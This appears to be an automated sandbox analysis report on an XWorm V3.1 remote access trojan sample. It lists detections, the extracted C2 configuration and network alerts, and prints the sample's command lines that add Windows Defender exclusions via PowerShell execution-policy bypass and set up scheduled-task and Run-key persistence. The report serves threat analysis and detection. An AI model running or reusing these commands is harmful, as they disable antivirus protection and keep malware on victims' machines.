
Windows Analysis Report
PjGz899RZV.exe

Overview

General Information

Sample name: PjGz899RZV.exe (renamed because the original name is a hash value)
Original sample name: 53db4fa18cd42cdb875538b91c6f500f22727be4cd1d0e0a618159462a8b76ba.exe
Analysis ID: 1579065
MD5: 2fcde28ef23d2644520ac5aefc123e61
SHA1: ce5c3d508ac86a431619f84d2d10ff149479e8bf
SHA256: 53db4fa18cd42cdb875538b91c6f500f22727be4cd1d0e0a618159462a8b76ba
Tags: exe, user-Chainskilabs

Detection

XWorm
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to log keystrokes (.Net Source)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • PjGz899RZV.exe (PID: 4236 cmdline: "C:\Users\user\Desktop\PjGz899RZV.exe" MD5: 2FCDE28EF23D2644520AC5AEFC123E61)
    • powershell.exe (PID: 7160 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PjGz899RZV.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2720 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'PjGz899RZV.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1924 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\PjGz899RZV.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 3608 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "PjGz899RZV" /tr "C:\Users\user\AppData\Roaming\PjGz899RZV.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 5324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • PjGz899RZV.exe (PID: 3404 cmdline: "C:\Users\user\AppData\Roaming\PjGz899RZV.exe" MD5: 2FCDE28EF23D2644520AC5AEFC123E61)
  • PjGz899RZV.exe (PID: 3052 cmdline: "C:\Users\user\AppData\Roaming\PjGz899RZV.exe" MD5: 2FCDE28EF23D2644520AC5AEFC123E61)
  • PjGz899RZV.exe (PID: 1864 cmdline: C:\Users\user\AppData\Roaming\PjGz899RZV.exe MD5: 2FCDE28EF23D2644520AC5AEFC123E61)
  • PjGz899RZV.exe (PID: 1612 cmdline: C:\Users\user\AppData\Roaming\PjGz899RZV.exe MD5: 2FCDE28EF23D2644520AC5AEFC123E61)
  • cleanup
{"C2 url": ["below-communist.gl.at.ply.gg"], "Port": 38116, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.1"}
Yara matches (Source / Rule / Description / Author / Strings)

Source: PjGz899RZV.exe
  Rule: JoeSecurity_XWorm | Description: Yara detected XWorm | Author: Joe Security
  Rule: MALWARE_Win_AsyncRAT | Description: Detects AsyncRAT | Author: ditekSHen
    • 0x7e80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x7f1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x8032:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x7af8:$cnc4: POST / HTTP/1.1

Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exe
  Rule: JoeSecurity_XWorm | Description: Yara detected XWorm | Author: Joe Security
  Rule: MALWARE_Win_AsyncRAT | Description: Detects AsyncRAT | Author: ditekSHen
    • 0x7e80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x7f1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x8032:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x7af8:$cnc4: POST / HTTP/1.1

Source: 00000000.00000000.2129079448.00000000000E2000.00000002.00000001.01000000.00000003.sdmp
  Rule: JoeSecurity_XWorm | Description: Yara detected XWorm | Author: Joe Security
  Rule: MALWARE_Win_AsyncRAT | Description: Detects AsyncRAT | Author: ditekSHen
    • 0x7c80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x7d1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x7e32:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x78f8:$cnc4: POST / HTTP/1.1

Source: Process Memory Space: PjGz899RZV.exe PID: 4236
  Rule: JoeSecurity_XWorm | Description: Yara detected XWorm | Author: Joe Security

Source: 0.0.PjGz899RZV.exe.e0000.0.unpack
  Rule: JoeSecurity_XWorm | Description: Yara detected XWorm | Author: Joe Security
  Rule: MALWARE_Win_AsyncRAT | Description: Detects AsyncRAT | Author: ditekSHen
    • 0x7e80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x7f1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x8032:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x7af8:$cnc4: POST / HTTP/1.1

            System Summary

Source: Process started
  Author: Florian Roth (Nextron Systems)
  Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PjGz899RZV.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PjGz899RZV.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PjGz899RZV.exe", ParentImage: C:\Users\user\Desktop\PjGz899RZV.exe, ParentProcessId: 4236, ParentProcessName: PjGz899RZV.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PjGz899RZV.exe', ProcessId: 7160, ProcessName: powershell.exe
Source: Process started
  Author: frack113
  Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PjGz899RZV.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PjGz899RZV.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PjGz899RZV.exe", ParentImage: C:\Users\user\Desktop\PjGz899RZV.exe, ParentProcessId: 4236, ParentProcessName: PjGz899RZV.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PjGz899RZV.exe', ProcessId: 7160, ProcessName: powershell.exe
Source: Registry Key set
  Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
  Data: Details: C:\Users\user\AppData\Roaming\PjGz899RZV.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\PjGz899RZV.exe, ProcessId: 4236, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PjGz899RZV
Source: Process started
  Author: Florian Roth (Nextron Systems)
  Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PjGz899RZV.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PjGz899RZV.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PjGz899RZV.exe", ParentImage: C:\Users\user\Desktop\PjGz899RZV.exe, ParentProcessId: 4236, ParentProcessName: PjGz899RZV.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PjGz899RZV.exe', ProcessId: 7160, ProcessName: powershell.exe
Source: File created
  Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
  Data: EventID: 11, Image: C:\Users\user\Desktop\PjGz899RZV.exe, ProcessId: 4236, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PjGz899RZV.lnk
Source: Process started
  Author: Florian Roth (Nextron Systems)
  Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "PjGz899RZV" /tr "C:\Users\user\AppData\Roaming\PjGz899RZV.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "PjGz899RZV" /tr "C:\Users\user\AppData\Roaming\PjGz899RZV.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\PjGz899RZV.exe", ParentImage: C:\Users\user\Desktop\PjGz899RZV.exe, ParentProcessId: 4236, ParentProcessName: PjGz899RZV.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "PjGz899RZV" /tr "C:\Users\user\AppData\Roaming\PjGz899RZV.exe", ProcessId: 3608, ProcessName: schtasks.exe
Source: Process started
  Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
  Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PjGz899RZV.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PjGz899RZV.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PjGz899RZV.exe", ParentImage: C:\Users\user\Desktop\PjGz899RZV.exe, ParentProcessId: 4236, ParentProcessName: PjGz899RZV.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PjGz899RZV.exe', ProcessId: 7160, ProcessName: powershell.exe
Suricata IDS alerts (Timestamp / SID / Severity / Classtype / Source IP / Source Port / Destination IP / Destination Port / Protocol)
2024-12-20T19:02:03.277167+0100 | 2853193 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49961 | 147.185.221.24 | 38116 | TCP

            AV Detection

Source: PjGz899RZV.exe | Avira: detected
Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exe | Avira: detection malicious, Label: TR/Spy.Gen
Source: PjGz899RZV.exe | Malware Configuration Extractor: Xworm {"C2 url": ["below-communist.gl.at.ply.gg"], "Port": 38116, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.1"}
Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exe | ReversingLabs: Detection: 81%
Source: PjGz899RZV.exe | ReversingLabs: Detection: 81%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exe | Joe Sandbox ML: detected
Source: PjGz899RZV.exe | Joe Sandbox ML: detected
Source: PjGz899RZV.exe | String decryptor: below-communist.gl.at.ply.gg
Source: PjGz899RZV.exe | String decryptor: 38116
Source: PjGz899RZV.exe | String decryptor: <123456789>
Source: PjGz899RZV.exe | String decryptor: <Xwormmm>
Source: PjGz899RZV.exe | String decryptor: USB.exe
Source: PjGz899RZV.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: PjGz899RZV.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Networking

Source: Network traffic | Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.6:49910 -> 147.185.221.24:38116
Source: Network traffic | Suricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.6:49961 -> 147.185.221.24:38116
Source: Malware configuration extractor | URLs: below-communist.gl.at.ply.gg
Source: global traffic | TCP traffic: 192.168.2.6:49801 -> 147.185.221.24:38116
Source: Joe Sandbox View | IP Address: 147.185.221.24
Source: Joe Sandbox View | ASN Name: SALSGIVERUS
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: below-communist.gl.at.ply.gg
Source: powershell.exe, 00000005.00000002.2333487305.00000204CD186000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.m
Source: powershell.exe, 00000008.00000002.2490603239.00000160F7B73000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.mic
Source: powershell.exe, 00000008.00000002.2490603239.00000160F7B73000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micft.cMicRosof
Source: powershell.exe, 00000002.00000002.2231159218.000002A2B0160000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2316892887.00000204C4A01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2456761857.0000016090070000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000008.00000002.2362621847.0000016080229000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000008.00000002.2490281197.00000160F79A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://schemas.mic
Source: powershell.exe, 00000002.00000002.2204739070.000002A2A0319000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2263189252.00000204B4BB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2362621847.0000016080229000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: PjGz899RZV.exe, 00000000.00000002.3393220395.0000000002391000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2204739070.000002A2A00F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2263189252.00000204B4991000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2362621847.0000016080001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.2204739070.000002A2A0319000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2263189252.00000204B4BB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2362621847.0000016080229000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000008.00000002.2362621847.0000016080229000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2204739070.000002A2A00F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2263189252.00000204B4991000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2362621847.0000016080001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000008.00000002.2456761857.0000016090070000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.2456761857.0000016090070000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.2456761857.0000016090070000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000008.00000002.2362621847.0000016080229000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2231159218.000002A2B0160000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2316892887.00000204C4A01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2456761857.0000016090070000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe

            Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: PjGz899RZV.exe, XLogger.cs | .Net Code: KeyboardLayout
Source: PjGz899RZV.exe.0.dr, XLogger.cs | .Net Code: KeyboardLayout

            Operating System Destruction

Source: C:\Users\user\Desktop\PjGz899RZV.exe | Process information set: 01 00 00 00

            System Summary

Source: PjGz899RZV.exe, type: SAMPLE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.0.PjGz899RZV.exe.e0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000000.2129079448.00000000000E2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exe, type: DROPPED | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\Desktop\PjGz899RZV.exe | Code function: 0_2_00007FFD34560E89
Source: C:\Users\user\Desktop\PjGz899RZV.exe | Code function: 0_2_00007FFD34569BA2
Source: C:\Users\user\Desktop\PjGz899RZV.exe | Code function: 0_2_00007FFD34560808
Source: C:\Users\user\Desktop\PjGz899RZV.exe | Code function: 0_2_00007FFD34568DF6
Source: C:\Users\user\Desktop\PjGz899RZV.exe | Code function: 0_2_00007FFD34561959
Source: C:\Users\user\Desktop\PjGz899RZV.exe | Code function: 0_2_00007FFD345654F2
Source: C:\Users\user\Desktop\PjGz899RZV.exe | Code function: 0_2_00007FFD34566AED
Source: C:\Users\user\Desktop\PjGz899RZV.exe | Code function: 0_2_00007FFD345675CD
Source: C:\Users\user\Desktop\PjGz899RZV.exe | Code function: 0_2_00007FFD345659ED
Source: C:\Users\user\Desktop\PjGz899RZV.exe | Code function: 0_2_00007FFD345685F5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD3455B9FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD34622E4F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_00007FFD34578E2C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_00007FFD3457B7FC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFD34579CD8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFD346430E9
Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exe | Code function: 15_2_00007FFD34540E89
Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exe | Code function: 15_2_00007FFD34541959
Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exe | Code function: 16_2_00007FFD34540E89
Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exe | Code function: 16_2_00007FFD34541959
Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exe | Code function: 17_2_00007FFD34570E89
Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exe | Code function: 17_2_00007FFD34571959
Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exe | Code function: 18_2_00007FFD34560E89
Source: PjGz899RZV.exe, 00000000.00000000.2129109978.00000000000EC000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameXClient45.exe4 vs PjGz899RZV.exe
Source: PjGz899RZV.exe | Binary or memory string: OriginalFilenameXClient45.exe4 vs PjGz899RZV.exe
Source: PjGz899RZV.exe.0.dr | Binary or memory string: OriginalFilenameXClient45.exe4 vs PjGz899RZV.exe
Source: PjGz899RZV.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: PjGz899RZV.exe, type: SAMPLE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.0.PjGz899RZV.exe.e0000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000000.2129079448.00000000000E2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: PjGz899RZV.exe, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: PjGz899RZV.exe, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: PjGz899RZV.exe, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: PjGz899RZV.exe.0.dr, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: PjGz899RZV.exe.0.dr, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: PjGz899RZV.exe.0.dr, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: PjGz899RZV.exe, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: PjGz899RZV.exe, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: PjGz899RZV.exe.0.dr, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: PjGz899RZV.exe.0.dr, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@17/17@1/1
Source: C:\Users\user\Desktop\PjGz899RZV.exe | File created: C:\Users\user\AppData\Roaming\PjGz899RZV.exe
Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exe | Mutant created: NULL
Source: C:\Users\user\Desktop\PjGz899RZV.exe | Mutant created: \Sessions\1\BaseNamedObjects\Jc3R9e9dWsfhw7z8
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6672:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6416:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5612:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5324:120:WilError_03
Source: C:\Users\user\Desktop\PjGz899RZV.exe | File created: C:\Users\user\AppData\Local\Temp\Log.tmp
Source: PjGz899RZV.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: PjGz899RZV.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\PjGz899RZV.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\PjGz899RZV.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: PjGz899RZV.exe | ReversingLabs: Detection: 81%
Source: C:\Users\user\Desktop\PjGz899RZV.exe | File read: C:\Users\user\Desktop\PjGz899RZV.exe
Source: unknown | Process created: C:\Users\user\Desktop\PjGz899RZV.exe "C:\Users\user\Desktop\PjGz899RZV.exe"
Source: C:\Users\user\Desktop\PjGz899RZV.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PjGz899RZV.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PjGz899RZV.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'PjGz899RZV.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PjGz899RZV.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\PjGz899RZV.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
